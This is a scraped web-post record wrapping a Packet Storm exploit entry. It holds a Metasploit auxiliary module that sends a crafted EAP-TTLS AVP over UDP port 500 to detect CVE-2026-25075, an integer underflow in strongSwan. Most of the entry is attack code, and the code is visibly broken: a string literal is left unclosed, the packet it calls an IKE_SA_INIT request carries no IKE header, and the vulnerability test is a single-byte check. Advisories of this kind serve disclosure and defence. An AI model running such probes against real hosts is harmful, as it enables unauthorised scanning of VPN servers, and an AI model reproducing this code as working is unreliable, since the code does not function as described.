{“lastseen”:”2026-05-11T17:15:38″,”description”:”This Metasploit auxiliary module is designed to detect a vulnerability in strongSwan’s EAP-TTLS implementation, identified as CVE-2026-25075. The issue is related to an integer underflow in the handling of AVP Attribute-Value Pair length fields during…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 strongSwan 4.5.0 EAP-TTLS Integer Underflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:220761″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25075″],”sourceData”:”==================================================================================================================================\\n | # Title : strongSwan 4.5.0 EAP-TTLS Integer Underflow Vulnerability Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/strongswan.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module is designed to detect a vulnerability in strongSwan\u2019s EAP-TTLS implementation, identified as CVE-2026-25075. \\n The issue is related to an integer underflow in the handling of AVP (Attribute-Value Pair) length fields during IKE-related UDP communication.\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::Udp\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n \\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘strongSwan EAP-TTLS AVP Integer Underflow Scanner’,\\n \\n ‘Description’ =\\u003e %q{\\n \\n This module exploits CVE-2026-25075 in strongSwan to investigate a flaw in the handling of AVP (Integer Underflow) length. The module sends a 1-length AVP header with no data, which is sufficient to detect the vulnerability without causing a crash. Server.\\n \\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n \\n ‘License’ =\\u003e MSF_LICENSE,\\n \\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-25075’],\\n \\n [‘URL’, ‘https:\/\/www.strongswan.org\/’]\\n \\n ],\\n \\n ‘DisclosureDate’ =\\u003e ‘2026-02-15’,\\n \\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n \\n ‘Reliability’ =\\u003e [],\\n \\n ‘SideEffects’ =\\u003e []\\n \\n }\\n )\\n )\\n \\n register_options(\\n [\\n Opt::RPORT(500),\\n \\n OptInt.new(‘IKE_TIMEOUT’, [true, ‘IKE request response timeout in seconds’, 5])\\n \\n ]\\n )\\n \\n end\\n \\n def craft_test_avp\\n \\n # Code: 79 (EAP-Message), Flags: 0x40 (Mandatory), Length: 1\\n \\n [79].pack(‘N’) + [0x40].pack(‘C’) + [1].pack(‘N’)[1, 3]\\n \\n end\\n \\n def run_host(ip)\\n \\n vprint_status(\\”#{ip} – Starting the CVE-2026-25075 scan…\\”)\\n \\n begin\\n \\n connect_udp\\n \\n print_status(\\”#{ip} – Sending an IKE_SA_INIT request…\\”)\\n \\n test_packet = craft_test_avp\\n \\n udp_sock.put(test_packet)\\n \\n res = udp_sock.get(datastore[‘IKE_TIMEOUT’])\\n \\n if res\\n \\n if is_vulnerable?(res)\\n \\n print_good(\\”#{ip} – Target is compromised With CVE-2026-25075 vulnerability!)\\n \\n report_vuln(\\n host: ip,\\n name: self.name,\\n refs: self.references,\\n info: ‘Server accepted AVP with invalid length (Integer Underflow)’\\n \\n )\\n else\\n vprint_status(\\”#{ip} – Server correctly rejected the packet.\\”)\\n end\\n \\n else\\n vprint_error(\\”#{ip} – No response received from the server.\\”)\\n end\\n \\n rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED\\n \\n vprint_error(\\”#{ip} – Unable to connect to UDP port #{datastore[‘RPORT’]}\\”)\\n \\n ensure\\n disconnect_udp\\n end\\n end\\n \\n def is_vulnerable?(data)\\n return false unless data \\u0026\\u0026 !data.empty?\\n \\n data.unpack1(‘C’) == 1\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220761″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/SC:N\/VI:N\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220761\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-11T17:15:38″,”description”:”This Metasploit auxiliary module is designed to detect a vulnerability in strongSwan’s EAP-TTLS implementation, identified as CVE-2026-25075. The issue is related to an integer underflow…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-53079","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n